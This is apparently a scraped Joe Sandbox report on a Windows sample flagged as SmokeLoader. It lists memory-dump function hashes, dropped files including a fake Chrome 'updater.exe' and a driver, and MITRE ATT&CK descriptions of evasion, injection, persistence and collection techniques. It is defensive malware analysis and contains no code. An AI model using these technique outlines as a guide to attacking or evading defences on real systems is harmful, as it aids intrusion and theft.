Opcode ID: fbb91ec51470bfac0e42d1a93aa3df661ba8cdf9e319fb405865a7ca65447f58
Instruction ID: 3005f0c0b0fe482d9db419c217e6d0666bb4347025619a028f3ffa8bdc115201
Opcode Fuzzy Hash: fbb91ec51470bfac0e42d1a93aa3df661ba8cdf9e319fb405865a7ca65447f58
Instruction Fuzzy Hash: 50E18431A0CA4D8FDF98EF5CC495AA97BE1FF69310F144169D40DD7296CA39E882CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34897593 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8f2c3a71dae550ba89785944e4a1cd2c76f78208327e92f68dfade0d076b66
Instruction ID: 9d13e5a8d8a5abfa1eb272e28e697b553d8d153784a44bf8d1e8e2e2d56b8301
Opcode Fuzzy Hash: fd8f2c3a71dae550ba89785944e4a1cd2c76f78208327e92f68dfade0d076b66
Instruction Fuzzy Hash: 7CB12D31A18A4D8FDF95EF5CD495AA9BBE1FFA9300F14416AD409D7295CB34E881CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34964943 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab066e8b5005572ea28a5dc2e06c7d30064d8058b636e89cad7f072d5b4af9d
Instruction ID: 2c2810fd4efcba02d94631be1cf5ffd20224fd1eb52a6b8435042aa6c7a503de
Opcode Fuzzy Hash: fab066e8b5005572ea28a5dc2e06c7d30064d8058b636e89cad7f072d5b4af9d
Instruction Fuzzy Hash: 5F512C22B0CA468FEBA9DA5C54B12B477D2EF85730B5800BFC25DC7197DE1CE8018359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489A0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
Instruction ID: 1d67cea7623b2511cd2c9d80a08de13d4e8d9550d673aea507a88136f15f82e6
Opcode Fuzzy Hash: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
Instruction Fuzzy Hash: CD31143191CB888FDB18DB5C9C4A6A97BE0FB69320F00426FE449D3252DA74A855CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3477EB80 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3040560603.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd3477d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92614516343dfaf8b6f97a49ebf04251a4301911b0f06ec28cf1bdf5f12eaa38
Instruction ID: ada1e605873c407839e29c9a2d6b8b060a2b1bbc3f7d866ec3d329af3489106b
Opcode Fuzzy Hash: 92614516343dfaf8b6f97a49ebf04251a4301911b0f06ec28cf1bdf5f12eaa38
Instruction Fuzzy Hash: 1241267140DBC48FE7568B289C959623FF0EF53224B1905EFD089CB1A3D629B84AC792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489B028 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
Instruction ID: d591b63e0b60cec4ce36873b078e094a3255c4033aa2956d309c48b636028e8d
Opcode Fuzzy Hash: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
Instruction Fuzzy Hash: 7321073190CB4C4FDB59DFACD84A7E97BF0EB96321F04416BD448C3152DA74A816CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3496498F Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ccb6b982221c8246c3d89547cf159bbb8f25444260bcc91d12ade881d7a20c3
Instruction ID: b515b9665523156c5770147603b276d3fced4accd96404ea5ba01c5c0aeadc58
Opcode Fuzzy Hash: 2ccb6b982221c8246c3d89547cf159bbb8f25444260bcc91d12ade881d7a20c3
Instruction Fuzzy Hash: 0321E722B4DA478FE7A8DE8854F117462C2EF96730B4900BED65DC71ABCE1CEC009359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34894675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction ID: 76085c6dd3716b73fd176d99b8e85ba88af67c9da9f3be81d669a3198407d212
Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction Fuzzy Hash: D301677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3651D636E881CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489E162 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8146b4a02df6343fcbfd97fdeac0c154443fb4cbc42250e13a4ee7aec5364f8e
Instruction ID: 550643e1f16975faf7f8e9fb8aea15373ee5db32e938f576bf45bc7bc7f91d44
Opcode Fuzzy Hash: 8146b4a02df6343fcbfd97fdeac0c154443fb4cbc42250e13a4ee7aec5364f8e
Instruction Fuzzy Hash: 72F06C3170C90C4BE70C6A9CB8565F973D1D795361B10517FF44AC3697EC26AC8386C5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489AE68 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edcec37ba492b1b856122c97c917f5aa774790ae09781bd631a72134a9b184d1
Instruction ID: 288812b5649b8611f2ed784edaa87feb173e8a12984723a3d6155455df5707d0
Opcode Fuzzy Hash: edcec37ba492b1b856122c97c917f5aa774790ae09781bd631a72134a9b184d1
Instruction Fuzzy Hash: 01F0B4308086CD8FDB06DF64CC596D57FA0EF17215F050297E459C71A2DB78A558CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD349653E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a3f460885ea7479df942685cea63193e9362c97a0acac8f3b9049c8c52240a
Instruction ID: 11115ef504ec598cc1930174cf8ed60594ebf8a1bb5a98a00476538532ad3ad6
Opcode Fuzzy Hash: 80a3f460885ea7479df942685cea63193e9362c97a0acac8f3b9049c8c52240a
Instruction Fuzzy Hash: 40F0303171CF044FE748EF2DE8496A6B7E1FBA8355F20462FE44AC3651DA25E8818786

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34964CD0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12485b9fdb7489a08c3137ab7a38fbfb5b06947795396fcbc2ce5c8270fe246d
Instruction ID: e19cc573dc101fe6c50e1f1e14f107c5e740c19e598c61674177c207a35cf437
Opcode Fuzzy Hash: 12485b9fdb7489a08c3137ab7a38fbfb5b06947795396fcbc2ce5c8270fe246d
Instruction Fuzzy Hash: 3EF05E32A0D5458FDB64EB9CE4A14E877E0FF4633071500BAE25DC75A7DA2AEC44C754

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Windows Analysis Report
file.exe

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre